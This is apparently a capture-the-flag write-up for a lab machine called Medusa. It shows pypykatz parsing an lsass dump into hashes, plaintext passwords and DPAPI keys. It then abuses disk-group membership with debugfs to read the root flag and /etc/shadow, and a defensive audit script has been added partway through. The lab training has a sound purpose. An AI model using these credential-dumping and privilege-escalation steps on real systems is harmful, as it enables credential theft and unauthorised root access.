MiniDump file: these typically contain stack traces, memory snapshots, thread information and other diagnostic data to help developers find and fix the cause of a crash.

12 streams: the file holds 12 streams, each of which may carry a different kind of data, such as threads, modules, exceptions or stacks.

Timestamp: 2023-01-17 14:08:32, the time the file was generated.

Type: 0x1826 denotes the file's specific type or version.

Ha, this is turning into forensics 🤣

skelsec/pypykatz: Mimikatz implementation in pure Python

A project on GitHub, a pure-Python implementation of mimikatz, can extract the information held in the dump.

Install it directly with pip.

❯ pip3 install pypykatz
❯ pypykatz lsa minidump lsass.DMP
INFO:pypykatz:Parsing file lsass.DMP
FILE: ======== lsass.DMP =======
== LogonSession ==
authentication_id 2261421 (2281ad)
session_id 18
username avijneyam
domainname Medusa-PC
logon_server MEDUSA-PC
logon_time 2023-01-17T14:05:20.008398+00:00
sid S-1-5-21-1556941724-2101079873-2087351601-1016
luid 2261421
== MSV ==
Username: avijneyam
Domain: Medusa-PC
LM: 009c022933c34479477921681300160c
NT: af71862c10235568287670ca23484fe5
SHA1: 3c9943f1b81e5cdab6cd00d694f8ddd19a079893
DPAPI: NA
== WDIGEST [2281ad]==
username avijneyam
domainname Medusa-PC
password 4v1jn3y4m_zxc
password (hex)3400760031006a006e003300790034006d005f007a0078006300000000000000
== Kerberos ==
Username: avijneyam
Domain: Medusa-PC
Password: 4v1jn3y4m_zxc
password (hex)3400760031006a006e003300790034006d005f007a0078006300000000000000
== WDIGEST [2281ad]==
username avijneyam
domainname Medusa-PC
password 4v1jn3y4m_zxc
password (hex)3400760031006a006e003300790034006d005f007a0078006300000000000000
== TSPKG [2281ad]==
username avijneyam
domainname Medusa-PC
password 4v1jn3y4m_zxc
password (hex)3400760031006a006e003300790034006d005f007a0078006300000000000000

== LogonSession ==
authentication_id 2167111 (211147)
session_id 17
username shelldredd
domainname Medusa-PC
logon_server MEDUSA-PC
logon_time 2023-01-17T14:04:31.112890+00:00
sid S-1-5-21-1556941724-2101079873-2087351601-1009
luid 2167111
== MSV ==
Username: shelldredd
Domain: Medusa-PC
LM: eed81a9f101536a4abb659e51581b7d4
NT: 4a88b7b647b8832ddd0660ec101c7471
SHA1: e2b9a8a7a676bad2060ee2b57cd497ae11d599f9
DPAPI: NA
== WDIGEST [211147]==
username shelldredd
domainname Medusa-PC
password t0p_s3cr3t
password (hex)7400300070005f0073003300630072003300740000000000
== Kerberos ==
Username: shelldredd
Domain: Medusa-PC
Password: t0p_s3cr3t
password (hex)7400300070005f0073003300630072003300740000000000
== WDIGEST [211147]==
username shelldredd
domainname Medusa-PC
password t0p_s3cr3t
password (hex)7400300070005f0073003300630072003300740000000000
== TSPKG [211147]==
username shelldredd
domainname Medusa-PC
password t0p_s3cr3t
password (hex)7400300070005f0073003300630072003300740000000000

== LogonSession ==
authentication_id 2072766 (1fa0be)
session_id 16
username powerful
domainname Medusa-PC
logon_server MEDUSA-PC
logon_time 2023-01-17T14:04:05.978125+00:00
sid S-1-5-21-1556941724-2101079873-2087351601-1012
luid 2072766
== MSV ==
Username: powerful
Domain: Medusa-PC
LM: 8657a86693ce10c313cb02d141696a00
NT: 9b05a607cfb0b59176092be732b6b814
SHA1: f2197be95bf11a3dc2f494b1a20814a3a27bd420
DPAPI: NA
== WDIGEST [1fa0be]==
username powerful
domainname Medusa-PC
password p0w3rf1ll_abc
password (hex)70003000770033007200660031006c006c005f00610062006300000000000000
== Kerberos ==
Username: powerful
Domain: Medusa-PC
Password: p0w3rf1ll_abc
password (hex)70003000770033007200660031006c006c005f00610062006300000000000000
== WDIGEST [1fa0be]==
username powerful
domainname Medusa-PC
password p0w3rf1ll_abc
password (hex)70003000770033007200660031006c006c005f00610062006300000000000000
== TSPKG [1fa0be]==
username powerful
domainname Medusa-PC
password p0w3rf1ll_abc
password (hex)70003000770033007200660031006c006c005f00610062006300000000000000

== LogonSession ==
authentication_id 1977311 (1e2bdf)
session_id 15
username alienum
domainname Medusa-PC
logon_server MEDUSA-PC
logon_time 2023-01-17T14:03:15.227148+00:00
sid S-1-5-21-1556941724-2101079873-2087351601-1018
luid 1977311
== MSV ==
Username: alienum
Domain: Medusa-PC
LM: ca68f3f2af89ee409b93859eb9628cfa
NT: f430978744f1846424852b47c4ee8a10
SHA1: 4c8c55d87f86d95146afd0fe1437d1d71384a15f
DPAPI: NA
== WDIGEST [1e2bdf]==
username alienum
domainname Medusa-PC
password 4l13num_qwerty
password (hex)34006c00310033006e0075006d005f0071007700650072007400790000000000
== Kerberos ==
Username: alienum
Domain: Medusa-PC
Password: 4l13num_qwerty
password (hex)34006c00310033006e0075006d005f0071007700650072007400790000000000
== WDIGEST [1e2bdf]==
username alienum
domainname Medusa-PC
password 4l13num_qwerty
password (hex)34006c00310033006e0075006d005f0071007700650072007400790000000000
== TSPKG [1e2bdf]==
username alienum
domainname Medusa-PC
password 4l13num_qwerty
password (hex)34006c00310033006e0075006d005f0071007700650072007400790000000000

== LogonSession ==
authentication_id 1881308 (1cb4dc)
session_id 14
username Claor
domainname Medusa-PC
logon_server MEDUSA-PC
logon_time 2023-01-17T14:02:32.235938+00:00
sid S-1-5-21-1556941724-2101079873-2087351601-1006
luid 1881308
== MSV ==
Username: Claor
Domain: Medusa-PC
LM: NA
NT: 7f62b734f90db005c14454d0e7982bf2
SHA1: 70cb75925c8a0b5825faaa344e9252ba9c23fa41
DPAPI: NA
== WDIGEST [1cb4dc]==
username Claor
domainname Medusa-PC
password n0s_v0lv1m0s_4_1lusi0n4r
password (hex)6e00300073005f00760030006c00760031006d00300073005f0034005f0031006c0075007300690030006e0034007200
== Kerberos ==
Username: Claor
Domain: Medusa-PC
Password: n0s_v0lv1m0s_4_1lusi0n4r
password (hex)6e00300073005f00760030006c00760031006d00300073005f0034005f0031006c0075007300690030006e0034007200
== WDIGEST [1cb4dc]==
username Claor
domainname Medusa-PC
password n0s_v0lv1m0s_4_1lusi0n4r
password (hex)6e00300073005f00760030006c00760031006d00300073005f0034005f0031006c0075007300690030006e0034007200
== TSPKG [1cb4dc]==
username Claor
domainname Medusa-PC
password n0s_v0lv1m0s_4_1lusi0n4r
password (hex)6e00300073005f00760030006c00760031006d00300073005f0034005f0031006c0075007300690030006e0034007200

== LogonSession ==
authentication_id 1785900 (1b402c)
session_id 13
username Pr0xy
domainname Medusa-PC
logon_server MEDUSA-PC
logon_time 2023-01-17T14:01:16.137305+00:00
sid S-1-5-21-1556941724-2101079873-2087351601-1017
luid 1785900
== MSV ==
Username: Pr0xy
Domain: Medusa-PC
LM: NA
NT: ba26a9d6f4cf057e1652257963729d49
SHA1: 802991035ea1acf65584c004f34a72902a0e609c
DPAPI: NA
== WDIGEST [1b402c]==
username Pr0xy
domainname Medusa-PC
password pr0xy_ch41ns_456
password (hex)700072003000780079005f0063006800340031006e0073005f00340035003600
== Kerberos ==
Username: Pr0xy
Domain: Medusa-PC
Password: pr0xy_ch41ns_456
password (hex)700072003000780079005f0063006800340031006e0073005f00340035003600
== WDIGEST [1b402c]==
username Pr0xy
domainname Medusa-PC
password pr0xy_ch41ns_456
password (hex)700072003000780079005f0063006800340031006e0073005f00340035003600
== TSPKG [1b402c]==
username Pr0xy
domainname Medusa-PC
password pr0xy_ch41ns_456
password (hex)700072003000780079005f0063006800340031006e0073005f00340035003600

== LogonSession ==
authentication_id 1692880 (19d4d0)
session_id 12
username nolo
domainname Medusa-PC
logon_server MEDUSA-PC
logon_time 2023-01-17T14:00:28.298438+00:00
sid S-1-5-21-1556941724-2101079873-2087351601-1019
luid 1692880
== MSV ==
Username: nolo
Domain: Medusa-PC
LM: 580bb7781b7384e43463667f1a71e97a
NT: d54fc8d1a368eab7bee473b8c7b93748
SHA1: 50908cf3b351621d70f7e55e9ca92c37b0a5990d
DPAPI: NA
== WDIGEST [19d4d0]==
username nolo
domainname Medusa-PC
password littl3_h4ck3r
password (hex)6c006900740074006c0033005f006800340063006b0033007200000000000000
== Kerberos ==
Username: nolo
Domain: Medusa-PC
Password: littl3_h4ck3r
password (hex)6c006900740074006c0033005f006800340063006b0033007200000000000000
== WDIGEST [19d4d0]==
username nolo
domainname Medusa-PC
password littl3_h4ck3r
password (hex)6c006900740074006c0033005f006800340063006b0033007200000000000000
== TSPKG [19d4d0]==
username nolo
domainname Medusa-PC
password littl3_h4ck3r
password (hex)6c006900740074006c0033005f006800340063006b0033007200000000000000

== LogonSession ==
authentication_id 1381468 (15145c)
session_id 11
username numero6
domainname Medusa-PC
logon_server MEDUSA-PC
logon_time 2023-01-17T13:59:06.967383+00:00
sid S-1-5-21-1556941724-2101079873-2087351601-1021
luid 1381468
== MSV ==
Username: numero6
Domain: Medusa-PC
LM: 3a9514532e68d1ade189cb5bf02b24bb
NT: e28f0fd696fb69d3317f1927c9e8d15c
SHA1: 8295426605ff734e2bf256b630d905983dd929b5
DPAPI: NA
== WDIGEST [15145c]==
username numero6
domainname Medusa-PC
password n1mb3r_s1x
password (hex)6e0031006d006200330072005f0073003100780000000000
== Kerberos ==
Username: numero6
Domain: Medusa-PC
Password: n1mb3r_s1x
password (hex)6e0031006d006200330072005f0073003100780000000000
== WDIGEST [15145c]==
username numero6
domainname Medusa-PC
password n1mb3r_s1x
password (hex)6e0031006d006200330072005f0073003100780000000000
== TSPKG [15145c]==
username numero6
domainname Medusa-PC
password n1mb3r_s1x
password (hex)6e0031006d006200330072005f0073003100780000000000
== DPAPI [15145c]==
luid 1381468
key_guid 05667fe6-e6a1-4e5d-ab98-d9ea9682dcf7
masterkey 2bae1dc400a32522b6efe39fe24d7c253dc8c74bd1dfb890699f940be9a79fd6d6ef465cef7d0af4c70c9fa335065b178dd8cdbfa60f3dcd62e3e88d22521f2a
sha1_masterkey ed4fb77971f735932fee0e9efd584e6d1bfb01e8

== LogonSession ==
authentication_id 1298068 (13ce94)
session_id 10
username ct0l4
domainname Medusa-PC
logon_server MEDUSA-PC
logon_time 2023-01-17T13:58:42.033789+00:00
sid S-1-5-21-1556941724-2101079873-2087351601-1010
luid 1298068
== MSV ==
Username: ct0l4
Domain: Medusa-PC
LM: NA
NT: c9bb6fbc746633a84652119bf544ebe3
SHA1: 82848b1644602bd6a500625b37fd8ed14807fda8
DPAPI: NA
== WDIGEST [13ce94]==
username ct0l4
domainname Medusa-PC
password b4ck3nd_pr0gr4m3r
password (hex)6200340063006b0033006e0064005f007000720030006700720034006d0033007200000000000000
== Kerberos ==
Username: ct0l4
Domain: Medusa-PC
Password: b4ck3nd_pr0gr4m3r
password (hex)6200340063006b0033006e0064005f007000720030006700720034006d0033007200000000000000
== WDIGEST [13ce94]==
username ct0l4
domainname Medusa-PC
password b4ck3nd_pr0gr4m3r
password (hex)6200340063006b0033006e0064005f007000720030006700720034006d0033007200000000000000
== TSPKG [13ce94]==
username ct0l4
domainname Medusa-PC
password b4ck3nd_pr0gr4m3r
password (hex)6200340063006b0033006e0064005f007000720030006700720034006d0033007200000000000000

== LogonSession ==
authentication_id 1000050 (f4272)
session_id 9
username LordP4
domainname Medusa-PC
logon_server MEDUSA-PC
logon_time 2023-01-17T13:57:52.044531+00:00
sid S-1-5-21-1556941724-2101079873-2087351601-1020
luid 1000050
== MSV ==
Username: LordP4
Domain: Medusa-PC
LM: 787465d75fac19613c442716b42e315b
NT: 4aef2b11d1bb6c7594c904035f611937
SHA1: 3f872737266578b9c6678f42ae1fadc19f34b523
DPAPI: NA
== WDIGEST [f4272]==
username LordP4
domainname Medusa-PC
password Wh1t3_h4ck
password (hex)570068003100740033005f006800340063006b0000000000
== Kerberos ==
Username: LordP4
Domain: Medusa-PC
Password: Wh1t3_h4ck
password (hex)570068003100740033005f006800340063006b0000000000
== WDIGEST [f4272]==
username LordP4
domainname Medusa-PC
password Wh1t3_h4ck
password (hex)570068003100740033005f006800340063006b0000000000
== TSPKG [f4272]==
username LordP4
domainname Medusa-PC
password Wh1t3_h4ck
password (hex)570068003100740033005f006800340063006b0000000000
== DPAPI [f4272]==
luid 1000050
key_guid 5062c530-69ce-4bc9-8272-9db84b775b3c
masterkey 6f53397764e60e283d112ce7da1b9425fced09e213b8c02044f28f9146928c8c91f5ddc7b586faa3d6b5896cd3ffd8f07991187ab9061ab32f111cdf3641f4e2
sha1_masterkey 1c8549da2ab13f26fe19d46bfafbccb6b518c96a

== LogonSession ==
authentication_id 933125 (e3d05)
session_id 8
username sml
domainname Medusa-PC
logon_server MEDUSA-PC
logon_time 2023-01-17T13:57:13.015234+00:00
sid S-1-5-21-1556941724-2101079873-2087351601-1014
luid 933125
== MSV ==
Username: sml
Domain: Medusa-PC
LM: 92cae3307cc9b39593e28745b8bf4ba6
NT: 37da1ddba9ebe6b1b36651fd5280c6af
SHA1: 4b1f807db4643e6529e1e591b572435384743e2d
DPAPI: NA
== WDIGEST [e3d05]==
username sml
domainname Medusa-PC
password th3_b0ss
password (hex)7400680033005f006200300073007300
== Kerberos ==
Username: sml
Domain: Medusa-PC
Password: th3_b0ss
password (hex)7400680033005f006200300073007300
== WDIGEST [e3d05]==
username sml
domainname Medusa-PC
password th3_b0ss
password (hex)7400680033005f006200300073007300
== TSPKG [e3d05]==
username sml
domainname Medusa-PC
password th3_b0ss
password (hex)7400680033005f006200300073007300

== LogonSession ==
authentication_id 845877 (ce835)
session_id 7
username spectre
domainname Medusa-PC
logon_server MEDUSA-PC
logon_time 2023-01-17T13:56:09.715430+00:00
sid S-1-5-21-1556941724-2101079873-2087351601-1004
luid 845877
== MSV ==
Username: spectre
Domain: Medusa-PC
LM: NA
NT: 6ec779920e220c163f33101085eff0b9
SHA1: 4d3341113c66127df14de8cc6ac7b4ebf52d74b5
DPAPI: NA
== WDIGEST [ce835]==
username spectre
domainname Medusa-PC
password 5p3ctr3_p0is0n_xX
password (hex)35007000330063007400720033005f00700030006900730030006e005f0078005800000000000000
== Kerberos ==
Username: spectre
Domain: Medusa-PC
Password: 5p3ctr3_p0is0n_xX
password (hex)35007000330063007400720033005f00700030006900730030006e005f0078005800000000000000
== WDIGEST [ce835]==
username spectre
domainname Medusa-PC
password 5p3ctr3_p0is0n_xX
password (hex)35007000330063007400720033005f00700030006900730030006e005f0078005800000000000000
== TSPKG [ce835]==
username spectre
domainname Medusa-PC
password 5p3ctr3_p0is0n_xX
password (hex)35007000330063007400720033005f00700030006900730030006e005f0078005800000000000000

== LogonSession ==
authentication_id 763754 (ba76a)
session_id 6
username RiJaba1
domainname Medusa-PC
logon_server MEDUSA-PC
logon_time 2023-01-17T13:55:03.742773+00:00
sid S-1-5-21-1556941724-2101079873-2087351601-1003
luid 763754
== MSV ==
Username: RiJaba1
Domain: Medusa-PC
LM: NA
NT: 139988f1c9a8a7cb6fb03762a6d510e7
SHA1: ff33ab3051fc5bc0fafd7d1c266c062136a1f266
DPAPI: NA
== WDIGEST [ba76a]==
username RiJaba1
domainname Medusa-PC
password littl3_h4ck3r_v2
password (hex)6c006900740074006c0033005f006800340063006b00330072005f0076003200
== Kerberos ==
Username: RiJaba1
Domain: Medusa-PC
Password: littl3_h4ck3r_v2
password (hex)6c006900740074006c0033005f006800340063006b00330072005f0076003200
== WDIGEST [ba76a]==
username RiJaba1
domainname Medusa-PC
password littl3_h4ck3r_v2
password (hex)6c006900740074006c0033005f006800340063006b00330072005f0076003200
== TSPKG [ba76a]==
username RiJaba1
domainname Medusa-PC
password littl3_h4ck3r_v2
password (hex)6c006900740074006c0033005f006800340063006b00330072005f0076003200

== LogonSession ==
authentication_id 682065 (a6851)
session_id 5
username jabatron
domainname Medusa-PC
logon_server MEDUSA-PC
logon_time 2023-01-17T13:54:24.123633+00:00
sid S-1-5-21-1556941724-2101079873-2087351601-1008
luid 682065
== MSV ==
Username: jabatron
Domain: Medusa-PC
LM: 162b58d2300279d1b7f036d77017ce3e
NT: 362e83945feaa2c874f39b670ef27deb
SHA1: 60cd5410d0cf4659d2b6012e134ebb989a37a241
DPAPI: NA
== WDIGEST [a6851]==
username jabatron
domainname Medusa-PC
password b1zum_3_AM
password (hex)620031007a0075006d005f0033005f0041004d0000000000
== Kerberos ==
Username: jabatron
Domain: Medusa-PC
Password: b1zum_3_AM
password (hex)620031007a0075006d005f0033005f0041004d0000000000
== WDIGEST [a6851]==
username jabatron
domainname Medusa-PC
password b1zum_3_AM
password (hex)620031007a0075006d005f0033005f0041004d0000000000
== TSPKG [a6851]==
username jabatron
domainname Medusa-PC
password b1zum_3_AM
password (hex)620031007a0075006d005f0033005f0041004d0000000000

== LogonSession ==
authentication_id 601672 (92e48)
session_id 4
username InfayerTS
domainname Medusa-PC
logon_server MEDUSA-PC
logon_time 2023-01-17T13:52:52.583594+00:00
sid S-1-5-21-1556941724-2101079873-2087351601-1011
luid 601672
== MSV ==
Username: InfayerTS
Domain: Medusa-PC
LM: 09b8d9346bc2c8435c7e856a3bfa37de
NT: 46a5b2901a6db08a0cb93a04dc6c1949
SHA1: e0fab5eb95b7c356da9a8f4f0239b1a510fd12c6
DPAPI: NA
== WDIGEST [92e48]==
username InfayerTS
domainname Medusa-PC
password UnD3sc0n0c1d0
password (hex)55006e00440033007300630030006e0030006300310064003000000000000000
== Kerberos ==
Username: InfayerTS
Domain: Medusa-PC
Password: UnD3sc0n0c1d0
password (hex)55006e00440033007300630030006e0030006300310064003000000000000000
== WDIGEST [92e48]==
username InfayerTS
domainname Medusa-PC
password UnD3sc0n0c1d0
password (hex)55006e00440033007300630030006e0030006300310064003000000000000000
== TSPKG [92e48]==
username InfayerTS
domainname Medusa-PC
password UnD3sc0n0c1d0
password (hex)55006e00440033007300630030006e0030006300310064003000000000000000

== LogonSession ==
authentication_id 526374 (80826)
session_id 3
username d4t4s3c
domainname Medusa-PC
logon_server MEDUSA-PC
logon_time 2023-01-17T13:52:02.861914+00:00
sid S-1-5-21-1556941724-2101079873-2087351601-1013
luid 526374
== MSV ==
Username: d4t4s3c
Domain: Medusa-PC
LM: 375262b6e52fb3710decb7ba03fdea49
NT: 6dd06920b7a4203d195f9f05084d6cb6
SHA1: 65b498805e94b4546396f8bd7a9ee093e85f1594
DPAPI: NA
== WDIGEST [80826]==
username d4t4s3c
domainname Medusa-PC
password br4in_br34k3r
password (hex)62007200340069006e005f0062007200330034006b0033007200000000000000
== Kerberos ==
Username: d4t4s3c
Domain: Medusa-PC
Password: br4in_br34k3r
password (hex)62007200340069006e005f0062007200330034006b0033007200000000000000
== WDIGEST [80826]==
username d4t4s3c
domainname Medusa-PC
password br4in_br34k3r
password (hex)62007200340069006e005f0062007200330034006b0033007200000000000000
== TSPKG [80826]==
username d4t4s3c
domainname Medusa-PC
password br4in_br34k3r
password (hex)62007200340069006e005f0062007200330034006b0033007200000000000000

== LogonSession ==
authentication_id 424519 (67a47)
session_id 2
username cromiphi
domainname Medusa-PC
logon_server MEDUSA-PC
logon_time 2023-01-17T13:50:58.337500+00:00
sid S-1-5-21-1556941724-2101079873-2087351601-1005
luid 424519
== MSV ==
Username: cromiphi
Domain: Medusa-PC
LM: NA
NT: e16a94ce4337564fbd00672ac12367fc
SHA1: 4905a08610106fda3be33780dd1384a3fa326c4b
DPAPI: NA
== WDIGEST [67a47]==
username cromiphi
domainname Medusa-PC
password br4in_br34k3r_v2
password (hex)62007200340069006e005f0062007200330034006b00330072005f0076003200
== Kerberos ==
Username: cromiphi
Domain: Medusa-PC
Password: br4in_br34k3r_v2
password (hex)62007200340069006e005f0062007200330034006b00330072005f0076003200
== WDIGEST [67a47]==
username cromiphi
domainname Medusa-PC
password br4in_br34k3r_v2
password (hex)62007200340069006e005f0062007200330034006b00330072005f0076003200
== TSPKG [67a47]==
username cromiphi
domainname Medusa-PC
password br4in_br34k3r_v2
password (hex)62007200340069006e005f0062007200330034006b00330072005f0076003200

== LogonSession ==
authentication_id 121589 (1daf5)
session_id 1
username Medusa
domainname Medusa-PC
logon_server MEDUSA-PC
logon_time 2023-01-17T13:39:39.941406+00:00
sid S-1-5-21-1556941724-2101079873-2087351601-1001
luid 121589
== MSV ==
Username: Medusa
Domain: Medusa-PC
LM: 44efce164ab921caaad3b435b51404ee
NT: 32ed87bdb5fdc5e9cba88547376818d4
SHA1: 6ed5833cf35286ebf8662b7b5949f0d742bbec3f
DPAPI: NA
== WDIGEST [1daf5]==
username Medusa
domainname Medusa-PC
password 123456
password (hex)31003200330034003500360000000000
== Kerberos ==
Username: Medusa
Domain: Medusa-PC
Password: 123456
password (hex)31003200330034003500360000000000
== WDIGEST [1daf5]==
username Medusa
domainname Medusa-PC
password 123456
password (hex)31003200330034003500360000000000
== TSPKG [1daf5]==
username Medusa
domainname Medusa-PC
password 123456
password (hex)31003200330034003500360000000000

== LogonSession ==
authentication_id 121543 (1dac7)
session_id 1
username Medusa
domainname Medusa-PC
logon_server MEDUSA-PC
logon_time 2023-01-17T13:39:39.941406+00:00
sid S-1-5-21-1556941724-2101079873-2087351601-1001
luid 121543
== MSV ==
Username: Medusa
Domain: Medusa-PC
LM: 44efce164ab921caaad3b435b51404ee
NT: 32ed87bdb5fdc5e9cba88547376818d4
SHA1: 6ed5833cf35286ebf8662b7b5949f0d742bbec3f
DPAPI: NA
== WDIGEST [1dac7]==
username Medusa
domainname Medusa-PC
password 123456
password (hex)31003200330034003500360000000000
== Kerberos ==
Username: Medusa
Domain: Medusa-PC
Password: 123456
password (hex)31003200330034003500360000000000
== WDIGEST [1dac7]==
username Medusa
domainname Medusa-PC
password 123456
password (hex)31003200330034003500360000000000
== TSPKG [1dac7]==
username Medusa
domainname Medusa-PC
password 123456
password (hex)31003200330034003500360000000000

== LogonSession ==
authentication_id 96251 (177fb)
session_id 0
username ANONYMOUS LOGON
domainname NT AUTHORITY
logon_server
logon_time 2023-01-17T13:39:17.902344+00:00
sid S-1-5-7
luid 96251

== LogonSession ==
authentication_id 997 (3e5)
session_id 0
username SERVICIO LOCAL
domainname NT AUTHORITY
logon_server
logon_time 2023-01-17T13:39:16.843750+00:00
sid S-1-5-19
luid 997
== Kerberos ==
Username:
Domain:

== LogonSession ==
authentication_id 996 (3e4)
session_id 0
username MEDUSA-PC$
domainname WORKGROUP
logon_server
logon_time 2023-01-17T13:39:16.828125+00:00
sid S-1-5-20
luid 996
== WDIGEST [3e4]==
username MEDUSA-PC$
domainname WORKGROUP
password None
password (hex)
== Kerberos ==
Username: medusa-pc$
Domain: WORKGROUP
== WDIGEST [3e4]==
username MEDUSA-PC$
domainname WORKGROUP
password None
password (hex)

== LogonSession ==
authentication_id 23426 (5b82)
session_id 0
username
domainname
logon_server
logon_time 2023-01-17T13:39:16.734375+00:00
sid None
luid 23426

== LogonSession ==
authentication_id 999 (3e7)
session_id 0
username MEDUSA-PC$
domainname WORKGROUP
logon_server
logon_time 2023-01-17T13:39:16.718750+00:00
sid S-1-5-18
luid 999
== WDIGEST [3e7]==
username MEDUSA-PC$
domainname WORKGROUP
password None
password (hex)
== Kerberos ==
Username: medusa-pc$
Domain: WORKGROUP
== WDIGEST [3e7]==
username MEDUSA-PC$
domainname WORKGROUP
password None
password (hex)
== DPAPI [3e7]==
luid 999
key_guid c005befa-c2f2-4f70-bce6-9199e1b3d537
masterkey 1b9c89f8747b31e23126511d184effa733f09c0425e813e4665825ae711043d75cd33d21718256b4f002b11e9b7ce8beba3a4d0d1524f64ae07c5b11450393ed
sha1_masterkey 063fc03a751363d0b597b119a554c505d50d79fc
== DPAPI [3e7]==
luid 999
key_guid 4ec4ace1-da38-4c23-b8bc-311167afd57a
masterkey 3e15960063b911f90ac5b696d08f049475736477a581d9bd878a348866d29fb8c4b1e07a2de410240676b55460681c876e9ef23ce64ba3bb6a84a72fbcd0fb17
sha1_masterkey 599b49e8537fa1be1dbd88441989ae8d4bd4054d
== DPAPI [3e7]==
luid 999
key_guid 4834d175-165a-48f4-9ecc-fb22225c3972
masterkey ea21228b08295250eb17cc72fb17926fca02688a4ce2542889bf2ee0908d615160e234f19c4964d0d31c58a5a74df4a1152f5328049b65090e887b78f9371bfd
sha1_masterkey 28594cfa5204bc52e36106051cd28ab896522920
== DPAPI [3e7]==
luid 999
key_guid f22e410f-f947-4e08-8f2a-8f65df603f8d
masterkey 19c05880b67d50f8231cd8009836e3cdc55610e4877f8b976abd5ca15600d0e759934324c6204b56f02527039e7fc52a1dfb5296d3381aaa7c3eb610dffa32fa
sha1_masterkey b859b2b52e7e49cf5c70069745c88853c4b23487

The logon sessions contain the password of user spectre:

username spectre
domainname Medusa-PC
password 5p3ctr3_p0is0n_xX

Alternatively, use GPT to process the text; honestly, this text processing is fairly involved 😅

❯ pypykatz lsa minidump lsass.DMP |awk '/username|password/ && !/password \(hex\)/ {gsub(/^[ \t]+/, "", $0); if ($1 == "username" && !seen[$2]++) {user=$2; print $1, $2} else if ($1 == "password" && !pass[user, $2]++) print $1, $2}'
INFO:pypykatz:Parsing file lsass.DMP
username avijneyam
password 4v1jn3y4m_zxc
username shelldredd
password t0p_s3cr3t
username powerful
password p0w3rf1ll_abc
username alienum
password 4l13num_qwerty
username Claor
password n0s_v0lv1m0s_4_1lusi0n4r
username Pr0xy
password pr0xy_ch41ns_456
username nolo
password littl3_h4ck3r
username numero6
password n1mb3r_s1x
username ct0l4
password b4ck3nd_pr0gr4m3r
username LordP4
password Wh1t3_h4ck
username sml
password th3_b0ss
username spectre
password 5p3ctr3_p0is0n_xX
username RiJaba1
password littl3_h4ck3r_v2
username jabatron
password b1zum_3_AM
username InfayerTS
password UnD3sc0n0c1d0
username d4t4s3c
password br4in_br34k3r
username cromiphi
password br4in_br34k3r_v2
username Medusa
password 123456
username ANONYMOUS
username SERVICIO
username MEDUSA-PC$
password None
username
password None

Try switching to this user:

(remote) www-data@medusa:/...$ su spectre
Password:
spectre@medusa:/...$ cd ~
spectre@medusa:~$ cat user.txt
good job!

487a5d1ce02c53fbf60c3abd300d9ff5

Root privilege escalation

The user spectre turns out to be a member of the disk group.

Interesting Groups - Linux Privesc - HackTricks

spectre@medusa:~$ id
uid=1000(spectre) gid=1000(spectre) groups=1000(spectre),6(disk),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),108(netdev)
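An added check for the same condition from the defender's side (not from the original post): it resolves each user's primary and secondary groups and reports which non-root accounts can open a block device for reading, which is what reading the raw filesystem with debugfs requires. The /etc/passwd, /etc/group and `ls -l` listing are constructed to mirror the id output above.

```python
# Added example (not from the original post): audit which non-root accounts get
# raw read access to block devices through group membership, the disk-group
# finding shown in the `id` output above.
import re

# Constructed copies of /etc/passwd, /etc/group and an `ls -l` listing of the
# device nodes, modelled on the id/df output above (spectre: uid 1000, disk gid 6).
PASSWD = """\
root:x:0:0:root:/root:/bin/bash
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
spectre:x:1000:1000::/home/spectre:/bin/bash
"""
GROUP = """\
root:x:0:
disk:x:6:spectre
cdrom:x:24:spectre
www-data:x:33:
spectre:x:1000:
"""
DEV_LISTING = """\
brw-rw---- 1 root disk 8, 0 Jan 17 13:39 /dev/sda
brw-rw---- 1 root disk 8, 1 Jan 17 13:39 /dev/sda1
brw-rw---- 1 root root 8, 2 Jan 17 13:39 /dev/sda2
"""

# "brw-rw----+ 1 root disk 8, 1 Jan 17 13:39 /dev/sda1" -> mode, owner, group, path
DEV_RE = re.compile(r"^(b[rwx-]{9})[+.]?\s+\d+\s+(\S+)\s+(\S+)\s+.*\s(/dev/\S+)$")


def parse_passwd(text):
    """name -> (uid, primary gid)"""
    users = {}
    for line in text.splitlines():
        if line and not line.startswith("#"):
            f = line.split(":")
            users[f[0]] = (int(f[2]), int(f[3]))
    return users


def parse_group(text):
    """name -> (gid, set of secondary members)"""
    groups = {}
    for line in text.splitlines():
        if line and not line.startswith("#"):
            name, _, gid, members = line.split(":")
            groups[name] = (int(gid), {m for m in members.split(",") if m})
    return groups


def groups_of(user, users, groups):
    """Primary group (resolved from the passwd gid) plus every secondary membership."""
    _, gid = users[user]
    return {g for g, (ggid, members) in groups.items() if ggid == gid or user in members}


def raw_readable_devices(users, groups, listing):
    """{user: [device, ...]} for every non-root account that can open a block
    device for reading (owner, group or world read bit), i.e. what debugfs needs."""
    findings = {}
    for line in listing.splitlines():
        m = DEV_RE.match(line.strip())
        if not m:
            continue
        mode, owner, group, dev = m.groups()
        for user, (uid, _) in users.items():
            if uid == 0:
                continue
            readable = (owner == user and mode[1] == "r") \
                or (mode[4] == "r" and group in groups_of(user, users, groups)) \
                or mode[7] == "r"
            if readable:
                findings.setdefault(user, []).append(dev)
    return findings
```

On a live host, feed it the real files and the output of `ls -l /dev/sd* /dev/nvme*`; the disk group should normally contain no interactive users at all.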

Check which device the root filesystem is mounted from:

spectre@medusa:~$ df -h
Filesystem Size Used Avail Use% Mounted on
/dev/sda1 6.9G 2.4G 4.2G 36% /
udev 471M 0 471M 0% /dev
tmpfs 489M 0 489M 0% /dev/shm
tmpfs 98M 508K 98M 1% /run
tmpfs 5.0M 0 5.0M 0% /run/lock
tmpfs 98M 0 98M 0% /run/user/1000

I originally wanted to modify the passwd file, but it failed with a permission error.

So just read the flag directly:

spectre@medusa:~$ debugfs -w /dev/sda1
debugfs 1.46.2 (28-Feb-2021)
debugfs: dump /home/spectre/passwd /etc/passwd
dump: Permission denied while opening /etc/passwd for dump_inode
debugfs: ls /root
debugfs: cat /root/.rO0t.txt
congrats hacker :)

34b1e6fc5e7fe0bfd56ed4b8776c9f5b
debugfs:

However, shadow can be read this way; grab the hash and try cracking it, just to try our luck.

This yields the root password andromeda:

spectre@medusa:~$ debugfs /dev/sda1
debugfs 1.46.2 (28-Feb-2021)
debugfs: cat /etc/shadow
root:$y$j9T$AjVXCCcjJ6jTodR8BwlPf.$4NeBwxOq4X0/0nCh3nrIBmwEEHJ6/kDU45031VFCWc2:19375:0:99999:7:::
daemon:*:19372:0:99999:7:::
bin:*:19372:0:99999:7:::
sys:*:19372:0:99999:7:::
sync:*:19372:0:99999:7:::
